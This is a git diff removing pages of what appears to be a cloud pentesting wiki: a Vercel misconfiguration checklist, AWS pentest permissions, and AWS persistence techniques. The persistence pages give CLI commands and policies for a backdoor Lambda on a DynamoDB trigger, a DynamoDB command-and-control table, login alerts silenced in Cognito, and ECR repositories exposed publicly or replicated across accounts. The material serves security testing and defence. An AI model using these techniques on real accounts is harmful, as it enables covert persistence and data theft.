Incorrectly setting up OIDC parameters or using insecure issuer URLs. -* **Risk:** Unauthorized access to backend services through flawed authentication flows. - -**Deployment Retention Policy** - -* **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention). -* **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments. - -**Recently Deleted Deployments** - -* **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions. -* **Risk:** Loss of critical deployment history, hindering audits and rollbacks. - -*** - -### Advanced - -**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security. - -#### Security Configurations: - -**Directory Listing** - -* **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file. -* **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks. - -*** - -## Project Firewall - -### Firewall - -#### Security Configurations: - -**Enable Attack Challenge Mode** - -* **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability -* **Risk:** Potential user experience problems. - -### Custom Rules & IP Blocking - -* **Misconfiguration:** Allows to unblock/block traffic -* **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic - -*** - -## Project Deployment - -### Source - -* **Misconfiguration:** Allows access to read the complete source code of the application -* **Risk:** Potential exposure of sensitive information - -### Skew Protection - -* **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other. -* **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future - -*** - -## Team Settings - -### General - -#### Security Configurations: - -* **Transfer** - * **Misconfiguration:** Allows to transfer all the projects to another team - * **Risk:** An attacker could steal the projects -* **Delete Project** - * **Misconfiguration:** Allows to delete the team with all the projects - * **Risk:** Delete the projects - -*** - -### Billing - -#### Security Configurations: - -* **Speed Insights Cost Limit** - * **Misconfiguration:** An attacker could increase this number - * **Risk:** Increased costs - -*** - -### Members - -#### Security Configurations: - -* **Add members** - * **Misconfiguration:** An attacker could maintain persitence inviting an account he control - * **Risk:** Attacker persistence -* **Roles** - * **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration. Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles) - * **Risk**: Increate the exposure of the Vercel Team - -*** - -### Access Groups - -An **Access Group** in Vercel is a collection of projects and team members with predefined role assignments, enabling centralized and streamlined access management across multiple projects. - -**Potential Misconfigurations:** - -* **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions. -* **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation. -* **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended. -* **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions. -* **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps. - -*** - -### Log Drains - -#### Security Configurations: - -* **Log Drains to third parties:** - * **Misconfiguration:** An attacker could configure a Log Drain to steal the logs - * **Risk:** Partial persistence - -*** - -### Security & Privacy - -#### Security Configurations: - -* **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard. - * **Misconfiguration:** - * Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting. - * Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain. - * **Risks:** - * **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team. - * **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals. -* **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access. - * **Misconfiguration:** Not adding critical Git scopes to the protected list. -* **Risks:** - * **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization. - * **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team. -* **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system. - * **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled. - * **Risks:** - * **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members. - * **Data Breach:** Sensitive information like API keys and credentials could be leaked. -* **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members. - * **Misconfiguration:**\ - Granting access to audit logs to unauthorized team members. - * **Risks:** - * **Privacy Violations:** Exposure of sensitive user activities and data. - * **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks. -* **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management. - * **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints. - * **Risk:** Maintain persistence -* **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains. - * **Misconfiguration:** Leaving IP address visibility enabled without necessity. - * **Risks:** - * **Privacy Violations:** Non-compliance with data protection regulations like GDPR. - * **Legal Repercussions:** Potential fines and penalties for mishandling personal data. -* **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing. - * **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic. - * **Risks:** - * **Service Denial to Legitimate Users:** Blocking access for valid users or partners. - * **Operational Disruptions:** Loss of service availability for certain regions or clients. - -*** - -### Secure Compute - -**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy. - -#### **Potential Misconfigurations and Risks** - -1. **Incorrect AWS Region Selection** - * **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region. - * **Risk:** Increased latency, potential data residency compliance issues, and degraded performance. -2. **Overlapping CIDR Blocks** - * **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks. - * **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks. -3. **Improper VPC Peering Configuration** - * **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates). - * **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches. -4. **Excessive Project Assignments** - * **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation. - * **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others. -5. **Inadequate IP Address Management** - * **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately. - * **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities. -6. **Including Build Containers Unnecessarily** - * **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds. - * **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources. -7. **Failure to Securely Handle Bypass Secrets** - * **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections. - * **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code. -8. **Ignoring Region Failover Configurations** - * **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings. - * **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency. -9. **Exceeding VPC Peering Connection Limits** - * **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections). - * **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions. -10. **Insecure Network Settings** - * **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network. - * **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks. - -*** - -### Environment Variables - -**Purpose:** Manage environment-specific variables and secrets used by all the projects. - -#### Security Configurations: - -* **Exposing Sensitive Variables** - * **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. - * **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. -* **Sensitive disabled** - * **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. - * **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md deleted file mode 100644 index 868bfe63a..000000000 --- a/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md +++ /dev/null @@ -1,43 +0,0 @@ -# AWS - Permissions for a Pentest - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools: - -* The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess) -* To run [aws\_iam\_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions: - * **access-analyzer:List\*** - * **access-analyzer:Get\*** - * **iam:CreateServiceLinkedRole** - * **access-analyzer:CreateAnalyzer** - * Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission) - * **access-analyzer:DeleteAnalyzer** - * Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md deleted file mode 100644 index eeeaca42b..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md +++ /dev/null @@ -1,58 +0,0 @@ -# AWS - API Gateway Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## API Gateway - -For more information go to: - -{% content-ref url="../aws-services/aws-api-gateway-enum.md" %} -[aws-api-gateway-enum.md](../aws-services/aws-api-gateway-enum.md) -{% endcontent-ref %} - -### Resource Policy - -Modify the resource policy of the API gateway(s) to grant yourself access to them - -### Modify Lambda Authorizers - -Modify the code of lambda authorizers to grant yourself access to all the endpoints.\ -Or just remove the use of the authorizer. - -### IAM Permissions - -If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\ -Or just remove the use of the authorizer. - -### API Keys - -If API keys are used, you could leak them to maintain persistence or even create new ones.\ -Or just remove the use of API keys. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md deleted file mode 100644 index ce324c3a2..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md +++ /dev/null @@ -1,70 +0,0 @@ -# AWS - Cognito Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cognito - -For more information, access: - -{% content-ref url="../aws-services/aws-cognito-enum/" %} -[aws-cognito-enum](../aws-services/aws-cognito-enum/) -{% endcontent-ref %} - -### User persistence - -Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like: - -* **Adding a User Pool** controlled by the user to an Identity Pool -* Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow** - * Or to an **authenticated Identity Pool** if the attacker can login - * Or **improve the permissions** of the given roles -* **Create, verify & privesc** via attributes controlled users or new users in a **User Pool** -* **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool - -Check how to do these actions in - -{% content-ref url="../aws-privilege-escalation/aws-cognito-privesc.md" %} -[aws-cognito-privesc.md](../aws-privilege-escalation/aws-cognito-privesc.md) -{% endcontent-ref %} - -### `cognito-idp:SetRiskConfiguration` - -An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options: - -{% code overflow="wrap" %} -```bash -aws cognito-idp set-risk-configuration --user-pool-id --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION} -``` -{% endcode %} - -By default this is disabled: - -
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md deleted file mode 100644 index c8ddc156e..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md +++ /dev/null @@ -1,91 +0,0 @@ -# AWS - DynamoDB Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### DynamoDB - -For more information access: - -{% content-ref url="../aws-services/aws-dynamodb-enum.md" %} -[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md) -{% endcontent-ref %} - -### DynamoDB Triggers with Lambda Backdoor - -Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account. - -{% code overflow="wrap" %} -```bash -# Create a malicious Lambda function -aws lambda create-function \ - --function-name MaliciousFunction \ - --runtime nodejs14.x \ - --role \ - --handler index.handler \ - --zip-file fileb://malicious_function.zip \ - --region - -# Associate the Lambda function with the DynamoDB table as a trigger -aws dynamodbstreams describe-stream \ - --table-name TargetTable \ - --region - -# Note the "StreamArn" from the output -aws lambda create-event-source-mapping \ - --function-name MaliciousFunction \ - --event-source \ - --region -``` -{% endcode %} - -To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function. - -### DynamoDB as a C2 Channel - -An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands. - -```bash -# Create a DynamoDB table for C2 -aws dynamodb create-table \ - --table-name C2Table \ - --attribute-definitions AttributeName=CommandId,AttributeType=S \ - --key-schema AttributeName=CommandId,KeyType=HASH \ - --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ - --region - -# Insert a command into the table -aws dynamodb put-item \ - --table-name C2Table \ - --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \ - --region -``` - -The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md deleted file mode 100644 index e2f500bf0..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md +++ /dev/null @@ -1,80 +0,0 @@ -# AWS - EC2 Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EC2 - -For more information check: - -{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} - -### Security Group Connection Tracking Persistence - -If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic. - -If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.** - -### EC2 Lifecycle Manager - -This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\ -An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**. - -### Scheduled Instances - -It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access. - -### Spot Fleet Request - -Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**. - -### Backdoor Instances - -An attacker could get access to the instances and backdoor them: - -* Using a traditional **rootkit** for example -* Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md)) -* Backdooring the **User Data** - -### **Backdoor Launch Configuration** - -* Backdoor the used AMI -* Backdoor the User Data -* Backdoor the Key Pair - -### VPN - -Create a VPN so the attacker will be able to connect directly through i to the VPC. - -### VPC Peering - -Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md deleted file mode 100644 index cdea71f8d..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md +++ /dev/null @@ -1,124 +0,0 @@ -# AWS - ECR Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ECR - -For more information check: - -{% content-ref url="../aws-services/aws-ecr-enum.md" %} -[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md) -{% endcontent-ref %} - -### Hidden Docker Image with Malicious Code - -An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner. - -### Repository Policy - -Add a policy to a single repository granting yourself (or everybody) access to a repository: - -```bash -aws ecr set-repository-policy \ - --repository-name cluster-autoscaler \ - --policy-text file:///tmp/my-policy.json - -# With a .json such as - -{ - "Version" : "2008-10-17", - "Statement" : [ - { - "Sid" : "allow public pull", - "Effect" : "Allow", - "Principal" : "*", - "Action" : [ - "ecr:BatchCheckLayerAvailability", - "ecr:BatchGetImage", - "ecr:GetDownloadUrlForLayer" - ] - } - ] -} -``` - -{% hint style="warning" %} -Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository. -{% endhint %} - -### Registry Policy & Cross-account Replication - -It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry. - -
- -First, you need to give the external account access over the registry with a **registry policy** like: - -```bash -aws ecr put-registry-policy --policy-text file://my-policy.json - -# With a .json like: - -{ - "Sid": "asdasd", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::947247140022:root" - }, - "Action": [ - "ecr:CreateRepository", - "ecr:ReplicateImage" - ], - "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*" -} -``` - -Then apply the replication config: - -```bash -aws ecr put-replication-configuration \ - --replication-configuration file://replication-settings.json \ - --region us-west-2 - -# Having the .json a content such as: -{ - "rules": [{ - "destinations": [{ - "region": "destination_region", - "registryId": "destination_accountId" - }], - "repositoryFilters": [{ - "filter": "repository_prefix_name", - "filterType": "PREFIX_MATCH" - }] - }] -} -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md deleted file mode 100644 index b534c2fd2..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# AWS - EFS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
